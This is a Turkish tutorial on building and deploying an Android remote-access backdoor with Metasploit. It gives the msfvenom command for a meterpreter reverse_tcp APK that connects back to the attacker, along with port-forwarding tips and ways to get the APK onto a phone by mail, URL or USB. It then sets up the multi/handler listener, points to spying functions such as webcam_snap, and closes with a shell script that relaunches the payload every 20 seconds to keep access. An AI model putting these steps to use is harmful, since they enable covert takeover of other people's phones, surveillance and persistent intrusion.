Metasploit ile Android payload kullanımı
Bu yazıya çok detaylı değinmeyeceğim çünkü bir çok kaynak bulabileceğiniz bir konu. Bu yüzden hızlı bir şekilde anlatıp bazı noktalara (notlara)değinmek istiyorum.
Öncelikle msfvenom kullanarak kendimize bir payload .apk oluşturuyoruz.
> msfvenom –p android/meterpreter/reverse_tcp set LHOST=192.168.1.20 R > /root/Desktop/and.apk
Masaüstümüze payload oluşturduk.
NOT 1: Eğer uzaktan bağlantı alacaksanız (aynı ağda değilseniz) LHOST kısmına dış ip adresinizi (internete çıkış yaptığınız ip adresinizi) yazacaksınız.
NOT 2: İç veya dış bağlantıda alsanız. Yerel ip (local ip) adresinize modem ara yüzünüzden port yönlendirmesi sağlamanız gerekmektedir.
NOT 3: Uzaktan yönetimde bağlanmanız yerel ağdan uzun sürebilir.
NOT 4: Modemde port yönlendirilir (AÇILMAZ). Modeminizden yönlendirdiğiniz portu kontrol etmek isteğinizde port kapalı yazacak. Çünkü yönlendirdiğiniz port yönlendirdiğiniz ip adresinde açık (LISTEN) durumda değil. Kontrol etmek için bir örnek vermek gerekirse ;
> nc –lvp 4444
Terminale yazarak netcat ile 4444 portunu açık (LISTEN) durumuna getirerek kontrol edebilirsiniz.
Bu işlemlerimizi tamamladıktan sonra oluşturduğumuz and.apk dosyamızı mail , url veya usb kablo aracılığı ile telefonumuza indiriyoruz/aktarıyoruz ve yüklüyoruz.
Şimdi uygulamayı açmadan exploit/multi/handler açarak dinlemeye geçelim.
Terminale ;
>service postgresql start
yazarak postgresql servisimizi başlattık
> service postgresql status
yazarak servisimiz aktif halde mi kontrol ediyoruz.
>msfconsole
msf> use exploit/multi/handler
msf> set payload android/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.20 (bu kısma dış bağlantı sağlayacakda olsanız. Yerel ip adresinizi yazacaksanız. Çünkü modeminizden gelen bağlantıyı yerelde yakalayacağınız yer burasıdır.)
msf> exploit
exploit dedik ve dinlemeye başladık.
Şimdi telefonumuza yüklediğimiz uygulamamızı açıyoruz. Bağlantıyı yakalıyoruz ve meterpreter çalışıyor.
Daha sonra ;
meterpreter>help
“help” komutunu yazarak bize sağladı fonksiyonlardan yaralanabiliriz.
Ayrıca yine bir fonksiyonu –h parametresi ile beraber kullanarak o fonksiyonun kullanımı konusunda bilgi sahibi olabiliriz. Örnek;
meterpreter> webcam_snap –h
NOT 5: Uygulama kapansa bile uygulamanın kendiliğinden yeniden başlamasını istiyorsanız.
— — — — — — — — — —
#!/bin/bash
while true
do am start — user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
— — — — — — — — — —
Yukarıdaki kod bloğunu bir not defterine yapıştırın ve *.sh uzantısıyla (ornek.sh) olarak kaydedin. Dosyayı meterpreter yardımıyla upload edin. Daha sonra Shell komutunu girin.
meterpreter> shell
Dosyanın bulunduğu dizine gidin ve dosyanızı çalıştırın.
> sh ornek.sh
Çalıştığından emin olduğunuzda CTRL + C ile çıkış yaparak meterpreter ‘a geri dönün. Telefonda açık olan uygulamayı kapatın. Meterpreter duracak ve oturumun öldüğünü söyleyecek. Bir kez enter tuşuna bastığınızda aktif exploit komut satırı gelecek. 20 saniye sonra exploit dediğinizde uygulama arka plan da tekrar çalışmaya başlayacak ve bağlantı sağlayacaksınız.
iyi çalışmalar ..